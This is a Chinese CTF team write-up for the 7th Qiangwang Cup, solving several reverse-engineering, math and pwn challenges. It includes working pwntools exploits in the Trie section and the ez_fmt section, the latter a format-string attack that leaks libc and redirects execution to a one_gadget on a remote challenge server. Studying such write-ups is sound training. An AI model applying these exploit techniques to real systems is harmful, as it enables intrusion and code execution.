    p.sendline(b'2')

while True:
    Z()
    Z()
    Z()
    Z()
    Z()
    O()
    O()
    T()
    T()
    Z()
    O()
    T()
    Z()
    T()
    Z()
    T()
    O()
    Z()
    T()
    O()
    O()
    Z()
    Z()
    O()
    O()
    O()
    T()
    T()
    T()
    Z()
    Z()
    O()
    T()
    Z()
    Z()
    T()
    T()
    O()
    O()
    Z()
    O()
    T()
    Z()
    O()
    Z()
    O()
    Z()
    T()
    O()
    T()
    T()
    Z()
    T()
    O()
    Z()
    Z()
    T()
    T()
    O()
    O()
    Z()
    O()
    Z()
    O()
    T()
    Z()
    T()
    Z()
    T()
    O()
    Z()
    T()
    O()
    Z()
    Z()
    O()
    O()
    O()
    T()
    T()
    O()
    Z()
    O()
    T()
    T()
    Z()
    O()
    T()
    Z()
    O()
    T()

    # 接收服務(wù)器的響應(yīng)
    b=p.recv()

    # 將響應(yīng)的字節(jié)字符串解碼為utf-8格式的字符串
    decoded_string4 = b.decode('utf-8')
    print(decoded_string4)

    # 向服務(wù)器發(fā)送請求
    p.sendline(b'2')
    a=p.recv()
    decoded_string = a.decode('utf-8')
    print(decoded_string)

Trie

? 題目讓我想到Trie樹。逆向觀察后的大致思路就是利用Trie樹的特性，通過發(fā)送特定的IP地址來觸發(fā)服務(wù)器端的某種漏洞，然后從服務(wù)器的響應(yīng)中提取出敏感信息。

? 根據(jù)思路調(diào)整，最后exp：

from pwn import *

# context.log_level = "debug"
context.terminal = ["/bin/tmux", "sp", "-h"]
context(arch='amd64', os='linux')

flag = ''

def add(sh, data):
    sh.sendlineafter("4. Quit.", "1")
    sh.sendlineafter("destination IP:", data)
    sh.sendlineafter("next hop:", data)

def show(sh, data):
    sh.sendlineafter("4. Quit.", "2")
    sh.sendlineafter("destination IP:", data)
    sh.recvuntil("The next hop is ")
    flag_part = sh.recvuntil('\n', drop=True).decode('utf-8')
    flag_part = flag_part.split('.')[::-1]
    return tostring(flag_part)

def get_flag(sh):
    sh.sendlineafter("4. Quit.", "3")

def tostring(t_flag):
    return ''.join(chr(int(i, 10)) for i in t_flag)

def padding():
    sh = remote("47.104.150.173", 1337)
    add(sh, "1.2.3.4")
    add(sh, "2.3.4.5")
    return sh

def retrieve_flag(ip):
    global flag
    sh = padding()
    add(sh, ip)
    get_flag(sh)
    flag += show(sh, ip)
    print(flag)

def main():
    ips = [
        "129.2.3.4",
        "193.2.3.4",
        "225.2.3.4",
        "241.2.3.4",
        "249.2.3.4",
        "253.2.3.4",
        "255.2.3.4",
        "254.2.3.4",
        "254.130.3.4",
        "254.194.3.4"
        ]
    for ip in ips:
        retrieve_flag(ip)

if __name__ == "__main__":
    main()

SpeedUp

我們先看一下題目：

$x=(2^{27})!$

def f(x):
    res = 0
    while x:
        res += x % 10
        x //= 10
    return res

? 意思是求2的27次方的階乘所獲得的每一位數(shù)字之和。

? 當(dāng)時想的是直接手搓，但又不大可能，后來在網(wǎng)上找了好久發(fā)現(xiàn)在OEIS直接記錄了：https://oeis.org/A244060

? 然后看他的list：

import hashlib
n=4495662081
n_str = str(n)

# 創(chuàng)建一個sha256哈希對象
sha256_hash = hashlib.sha256()
# 提供要哈希的數(shù)據(jù)
sha256_hash.update(n_str.encode('utf-8'))
# 獲取哈希值
hash_value = sha256_hash.hexdigest()
print("flag{"+hash_value+"}")

flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797}

ezre

? 一眼看到main函數(shù)：

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int v3; // eax
  unsigned int v4; // eax
  int v5; // eax
  size_t v6; // rax
  int v7; // edx
  unsigned int v8; // eax
  int v9; // eax
  int v10; // eax
  int v11; // eax
  size_t v12; // rax
  int v13; // ecx
  int v14; // eax
  int v16; // [rsp+128h] [rbp-118h]
  int v17; // [rsp+12Ch] [rbp-114h]
  int v18; // [rsp+130h] [rbp-110h]
  int v19; // [rsp+134h] [rbp-10Ch]
  int v20; // [rsp+138h] [rbp-108h]
  int v21; // [rsp+13Ch] [rbp-104h]
  char v22[64]; // [rsp+140h] [rbp-100h] BYREF
  char v23[64]; // [rsp+180h] [rbp-C0h] BYREF
  char v24[64]; // [rsp+1C0h] [rbp-80h] BYREF
  char s[52]; // [rsp+200h] [rbp-40h] BYREF
  unsigned int v26; // [rsp+234h] [rbp-Ch]
  size_t v27; // [rsp+238h] [rbp-8h]

  v26 = 0;
  printf("Welcome to the CTF world:");
  memset(s, 0, 0x32uLL);
  __isoc99_scanf("%s", s);
  v27 = strlen(s);
  v16 = 1111065332;
  while ( 1 )
  {
    while ( 1 )
    {
      while ( 1 )
      {
        while ( 1 )
        {
          while ( 1 )
          {
            while ( 1 )
            {
              while ( 1 )
              {
                while ( v16 == -1884415306 )
                  v16 = 874394363;
                if ( v16 != -1610796817 )
                  break;
                v5 = 951531691;
                if ( v21 < 4 )
                  v5 = -123677562;
                v16 = v5;
              }
              if ( v16 != -1571665377 )
                break;
              v8 = strlen(v22);
              sub_401980(v22, v23, v8);
              memset(v22, 0, 0x32uLL);
              memcpy(v22, v23, 0x32uLL);
              v16 = -1884415306;
            }
            if ( v16 != -1125271585 )
              break;
            v16 = 502592025;
          }
          if ( v16 != -1034568323 )
            break;
          ++v17;
          v16 = 359215778;
        }
        if ( v16 != -728174227 )
          break;
        printf("wrong!");
        v26 = 0;
        v16 = -88181297;
      }
      if ( v16 == -139558179 )
      {
        printf("Wrong!");
        exit(-1);
      }
      if ( v16 != -123677562 )
        break;
      srand(byte_406132);
      v6 = strlen((const char *)(unsigned int)byte_406130);
      sub_401D10(byte_406130, v6);
      v7 = 1367925527;
      if ( (v21 & 1) != 0 )
        v7 = -1571665377;
      v16 = v7;
    }
    if ( v16 == -88181297 )
      break;
    switch ( v16 )
    {
      case 178472351:
        sub_402EE0(byte_406130, &byte_406130[v20]);
        v19 = 0;
        v16 = 244862061;
        break;
      case 201400792:
        v16 = -1034568323;
        break;
      case 244862061:
        v10 = 1368236239;
        if ( v19 < v20 )
          v10 = 1736470037;
        v16 = v10;
        break;
      case 282724921:
        v4 = strlen(s);
        v21 = 0;
        v16 = -1610796817;
        sub_401980(s, v22, v4);
        break;
      case 359215778:
        v12 = strlen(v23);
        v13 = 2026466323;
        if ( v17 < v12 )
          v13 = 1003071928;
        v16 = v13;
        break;
      case 384994120:
        v11 = -1125271585;
        if ( v18 < v20 )
          v11 = 1105882884;
        v16 = v11;
        break;
      case 502592025:
        sub_401EB0(v23, v24);
        v17 = 0;
        v16 = 359215778;
        break;
      case 728190549:
        v18 = 0;
        v16 = 384994120;
        break;
      case 874394363:
        ++v21;
        v16 = -1610796817;
        break;
      case 951531691:
        v9 = 728190549;
        v20 = 64;
        if ( dword_4062C0 == 1 )
          v9 = 178472351;
        v16 = v9;
        break;
      case 1003071928:
        v14 = 201400792;
        if ( byte_406180[v17] != v24[v17] )
          v14 = -728174227;
        v16 = v14;
        break;
      case 1105882884:
        byte_406130[v18] ^= 0x27u;
        v16 = 1837459842;
        break;
      case 1111065332:
        v3 = 282724921;
        if ( v27 != 34 )
          v3 = -139558179;
        v16 = v3;
        break;
      case 1367925527:
        sub_401250(v22, v23);
        memset(v22, 0, 0x32uLL);
        memcpy(v22, v23, 0x32uLL);
        v16 = -1884415306;
        break;
      case 1368236239:
        v16 = 502592025;
        break;
      case 1558803342:
        ++v19;
        v16 = 244862061;
        break;
      case 1736470037:
        byte_406130[v19] = (5 * (byte_406130[v19] + 3)) ^ 0x15;
        v16 = 1558803342;
        break;
      case 1837459842:
        ++v18;
        v16 = 384994120;
        break;
      default:
        printf("right!");
        v26 = 0;
        v16 = -88181297;
        break;
    }
  }
  return v26;
}

? 接收用戶輸入的字符串，并對其進(jìn)行一系列復(fù)雜的操作和檢查。這些操作和檢查是通過一個嵌套的while循環(huán)和switch語句實現(xiàn)的，這個循環(huán)和語句的控制流程由一個狀態(tài)變量v16控制。

? 在這個循環(huán)和語句中，根據(jù)v16的值，程序會執(zhí)行不同的操作，包括調(diào)用一些未在這段代碼中定義的函數(shù)（如sub_401980、sub_401D10等）、改變v16的值、改變其他變量的值等。

? 然后在這找加密方式找了好久，后來無意中發(fā)現(xiàn)了這個

? 先去除平坦混淆（https://github.com/cq674350529/deflat），然后分析加密：

? 先base然后異或，提取字符解：

from z3 import Solver, BitVec, sat

# 創(chuàng)建一個Solver對象
s = Solver()

# 創(chuàng)建一個長度為48的列表，列表中的每個元素都是一個8位的BitVec對象
# BitVec對象的名稱是它們在列表中的索引
needdd = [BitVec("%d" % i, 8) for i in range(48)]

# 給定字節(jié)列表
cmp = [
    0x3A, 0x2C, 0x4B, 0x51, 0x68, 0x46, 0x59, 0x63, 0x24, 0x04, 0x5E, 0x5F,
    0x00, 0x0C, 0x2B, 0x03, 0x29, 0x5C, 0x74, 0x70, 0x6A, 0x62, 0x7F, 0x3D,
    0x2C, 0x4E, 0x6F, 0x13, 0x06, 0x0D, 0x06, 0x0C, 0x4D, 0x56, 0x0F, 0x28,
    0x4D, 0x51, 0x76, 0x70, 0x2B, 0x05, 0x51, 0x68, 0x48, 0x55, 0x24, 0x19
]

# 生成異或值列表
table = [
    0x53, 0x46, 0x4E, 0x72, 0x49, 0x42, 0x6D, 0x6E, 0x4F, 0x4C, 0x10, 0x56,
    0x74, 0x7E, 0x62, 0x4D, 0x63, 0x16, 0x6C, 0x4A, 0x1E
]

# 初始化變量v7
v7 = 2023

for i in range(47):
    # 根據(jù)i的值，使用不同的方式更新v7，并從table中取出一個值與needdd[i]進(jìn)行異或操作
    if i % 3 == 1:
        v7 = (v7 + 5) % 20
        v3 = table[v7 + 1]
    elif i % 3 == 2:
        v7 = (v7 + 7) % 19
        v3 = table[v7 + 2]
    else:
        v7 = (v7 + 3) % 17
        v3 = table[v7 + 3]
    
    # 將needdd[i]與v3進(jìn)行異或操作，并將結(jié)果存回needdd[i]
    needdd[i] = needdd[i] ^ v3
    
    # 將needdd[i]的值存儲在v4中
    v4 = needdd[i]
    
    i += 1
    
    # v4與下一個needdd[i]進(jìn)行異或操作，并將結(jié)果存回needdd[i]
    needdd[i] = v4 ^ needdd[i]

# 為Solver添加約束條件，即needdd列表中的每個元素都必須與cmp列表中對應(yīng)的元素相等
for i in range(48):
    s.add(cmp[i] == needdd[i])

# 檢查是否存在滿足所有約束條件的解
if s.check() == sat:
    # 如果存在解則輸出
    model = s.model()
    print(model)

? 輸出：

[26 = 76, 
 8 = 87,  
 0 = 87,  
 33 = 82, 
 34 = 55, 
 44 = 110,
 42 = 68, 
 2 = 113, 
 12 = 79, 
 3 = 83,  
 16 = 102,
 28 = 107,
 38 = 55,
 14 = 105,
 27 = 108,
 29 = 69,
 22 = 83,
 9 = 66,
 43 = 71,
 11 = 108,
 1 = 90,
 25 = 116,
 19 = 106,
 24 = 115,
 4 = 87,
 18 = 97,
 20 = 87,
 31 = 70,
 45 = 112,
 32 = 87,
 46 = 61,
 30 = 102,
 13 = 114,
 17 = 99,
 10 = 76,
 36 = 47,
 15 = 69,
 21 = 66,
 7 = 116,
 23 = 82,
 39 = 100,
 35 = 106,
 5 = 99,
 47 = 61,
 40 = 77,
 41 = 67,
 37 = 82,
 6 = 85]

? 變異base64按順序加解密：

l+USN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLr

FGseVD3ibtHWR1czhLnUfJK6SEZ2OyPAIpQoqgY0w49u+7rad5CxljMXvNTBkm/8

Hc0xwuZmy3DpQnSgj2LhUtrlVvNYks+BX/MOoETaKqR4eb9WF8ICGzf6id1P75JA

pnHQwlAveo4DhGg1jE3SsIqJ2mrzxCiNb+Mf0YVd5L8c97/WkOTtuKFZyRBUPX6a

plxXOZtaiUneJIhk7qSYEjD1Km94o0FTu52VQgNL3vCBH8zsA/b+dycGPRMwWfr6

? 解密：

import base64

def custom_b64decode(s, custom_alphabet):
    standard_alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    # 創(chuàng)建一個翻譯表
    translation_table = str.maketrans(custom_alphabet, standard_alphabet)
    # 將自定義base64編碼的字符串翻譯成標(biāo)準(zhǔn)base64編碼的字符串
    standard_b64encoded = s.translate(translation_table)
    # 添加必要的填充字符
    padding_needed = 4 - len(standard_b64encoded) % 4
    if padding_needed:
        standard_b64encoded += '=' * padding_needed
    # 解碼標(biāo)準(zhǔn)base64編碼的字符串
    return base64.b64decode(standard_b64encoded)

# 自定義的base64 Alphabet
custom_alphabet = 'l+USN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLr'
# 要解密的密文
encoded_string = 'B6gtBdq8BGN1VX+yIdECBGt9a8N1TyIvB9hCo9hDA543uc'

# 解密操作
decoded_bytes = custom_b64decode(encoded_string, custom_alphabet)

decoded_string = decoded_bytes.decode('utf-8')
print(decoded_string)

flag{3ea590ccwxehg715264fzxnzepqz}

ez_fmt

? 給定了輸入的堆棧地址和格式化字符串漏洞，我們可以修改任何地址。但是，程序執(zhí)行完畢后，w會被設(shè)置為0，這使得下一次利用變得更加困難。因此，我們需要在w被設(shè)置為0之前進(jìn)行操作。

? 我們可以修改printf的返回地址。同時，由于printf函數(shù)需要堆棧對齊，所以返回地址應(yīng)該被設(shè)置為0x4011ED。此外，我們還需要泄露出libc地址，以便進(jìn)行第二次利用，將函數(shù)的返回地址修改為one_gadget。

from pwn import *

# 設(shè)置pwntools的上下文環(huán)境為Linux amd64
context(os='linux', arch='amd64', log_level='debug')

#p = process('./ez_fmt')
p = remote('47.104.24.40', 1337)

# 加載本地的二進(jìn)制文件和libc文件
elf = ELF('./ez_fmt')
libc = ELF('./libc-2.31.so')

# 接收直到遇到"0x"，然后讀取12個字符，轉(zhuǎn)換為棧地址
p.recvuntil("0x")
stack=int(p.recv(12),16)
print(hex(stack))

# 構(gòu)造payload，用于修改棧上的值
pay=b'%4589c%11$hn%19$p'.ljust(0x28,b'\x00')+p64(stack-8)
p.send(pay)

# 再次接收直到"0x"，讀取12個字符，計算libc基地址
p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['__libc_start_main']-243
print(hex(libc_base))

# 計算one_gadget的地址
one_gadget=libc_base+0xe3b01
p.recvuntil("\n")

# 計算one_gadget的低16位
one_gadget_low = one_gadget&0xffff
# 計算one_gadget的高16位
one_gadget_high = (one_gadget>>16)&0xffff

# 構(gòu)造格式化字符串，用于寫入one_gadget的低16位
fmt_low = b'%'+str(one_gadget_low).encode()+b'c%10$hn'
# 構(gòu)造格式化字符串，用于寫入one_gadget的高16位
fmt_high = b'%'+str(((one_gadget>>16)&0xffff)-(one_gadget_low)).encode()+b'c%11$hn'

# 將兩個格式化字符串連接起來，然后用'\x00'填充到0x20字節(jié)
fmt_str = (fmt_low+fmt_high).ljust(0x20,b'\x00')

# 計算要寫入的內(nèi)存地址
addr_low = p64(stack+0x68)
addr_high = p64(stack+0x68 + 2)

# 構(gòu)造最終payload
pay=fmt_str+addr_low+addr_high
p.send(pay)

p.interactive()

Babyre

發(fā)現(xiàn)有TLS

__int64 __fastcall TlsCallback_1_0(__int64 a1, char a2)
{
  __int64 v2; // rcx
  struct _PEB *v3; // rax
  __int64 result; // rax
  int i; // [rsp+44h] [rbp+24h]

  sub_14001138E(&unk_1400240F4);
  v3 = NtCurrentPeb();
  LOBYTE(v3) = v3->BeingDebugged;
  if ( (_BYTE)v3 == 1 )
  {
    LOBYTE(v2) = v3->BeingDebugged;
    sub_140011AE0(v2);
  }
  result = a2 & 1;
  if ( (a2 & 1) != 0 )
  {
    for ( i = 0; i < 32; ++i )
    {
      *((_BYTE *)off_14001E060 + i + 1) ^= i;
      result = (unsigned int)(i + 1);
    }
  }
  return result;
}

__int64 sub_140012050()
{
  char *v0; // rdi
  __int64 i; // rcx
  char v3[32]; // [rsp+0h] [rbp-20h] BYREF
  char v4; // [rsp+20h] [rbp+0h] BYREF
  _DWORD v5[15]; // [rsp+28h] [rbp+8h] BYREF
  int j; // [rsp+64h] [rbp+44h]
  int k; // [rsp+84h] [rbp+64h]

  v0 = &v4;
  for ( i = 34i64; i; --i )
  {
    *(_DWORD *)v0 = -858993460;
    v0 += 4;
  }
  sub_14001138E((__int64)&unk_1400240F4);
  sub_1400111A9((__int64)&unk_14001AD78);
  sub_14001123F(aPleaseInputYou);
  std::istream::getline(std::cin, Str, 33i64);
  if ( j_strlen(Str) == 32 )
  {
    memset(v5, 0, 0x20ui64);
    sub_140011019((__int64)v5, (__int64)Str);
    for ( j = 0; j < 4; ++j )
      sub_14001106E(&v5[2 * j], &v5[2 * j + 1]);
    sub_140011087((__int64)v5, (__int64)byte_14001E218);
    for ( k = 0; k < 32; ++k )
    {
      if ( byte_14001E040[k] != byte_14001E218[k] )
      {
        sub_14001123F(aNoNoNo);
        sub_1400111A9((__int64)"%d");
        goto LABEL_15;
      }
    }
    sub_14001123F(aYes);
  }
  else
  {
    sub_1400111A9((__int64)"Wrong Length!");
  }
LABEL_15:
  sub_140011325(v3, &unk_14001AD30);
  return 0i64;
}

? 最后exp：

#include<stdio.h>
#include<stdint.h>

// 定義解密函數(shù)，使用TEA算法的變種進(jìn)行解密
void decrypt(uint32_t v[2], uint32_t const key[4])
{
    unsigned int i,j;
    // 初始化變量，v0和v1為要解密的數(shù)據(jù)，delta為一個常數(shù)，sum為解密過程中使用的累加變量
    uint32_t v0=v[0], v1=v[1], delta=0x88408067, sum=0xd192c263;
    // 進(jìn)行32輪解密操作
    for(i=0;i<4;i++)
    {
        for(j=0;j<33;j++)
        {
            // 每輪解密中減去delta更新sum值
            sum-=delta;
            // 根據(jù)TEA算法變種進(jìn)行解密的核心步驟
            v1-=(((v0<<5)^(v0>>4))+v0)^(sum+key[(sum>>11)&3]);
            v0-=(((v1<<5)^(v1>>4))+v1)^(sum+key[sum&3])^sum;
        }
    }
    // 將解密后的數(shù)據(jù)寫回原數(shù)組
    v[0]=v0;
    v[1]=v1;
}

int main()
{
    // 初始化要解密的數(shù)據(jù)數(shù)組
    uint32_t array[8]={0x9523F2E0, 0x8ED8C293, 0x8668C393, 0xDDF250BC, 0x510E4499, 0x8C60BD44, 0x34DCABF2, 0xC10FD260};
    // 初始化密鑰
    uint32_t key[4]={0x62, 0x6F, 0x6D, 0x62};
    // 循環(huán)解密數(shù)組中的每對數(shù)據(jù)
    for(int i=0;i<8;i+=2)
    {
        uint32_t temp[2];
        // 取出一對數(shù)據(jù)
        temp[0]=array[i];
        temp[1]=array[i + 1];
        // 調(diào)用解密函數(shù)
        decrypt(temp, key);
        // 打印解密后的數(shù)據(jù)，每個uint32_t解密后為4個字符
        printf("%c%c%c%c%c%c%c%c",
            (char)(temp[0] >> 0), (char)(temp[0] >> 8), 
            (char)(temp[0] >> 16), (char)(temp[0] >> 24),
            (char)(temp[1] >> 0), (char)(temp[1] >> 8), 
            (char)(temp[1] >> 16), (char)(temp[1] >> 24));
    }
    return 0;
}

flag{W31com3_2_Th3_QwbS7_4nd_H4v3_Fun}文章來源地址http://www.zghlxwxcb.cn/news/detail-764494.html

到了這里，關(guān)于[ CTF ]【天格】戰(zhàn)隊WriteUp-第七屆“強(qiáng)網(wǎng)杯”全國安全挑戰(zhàn)賽的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！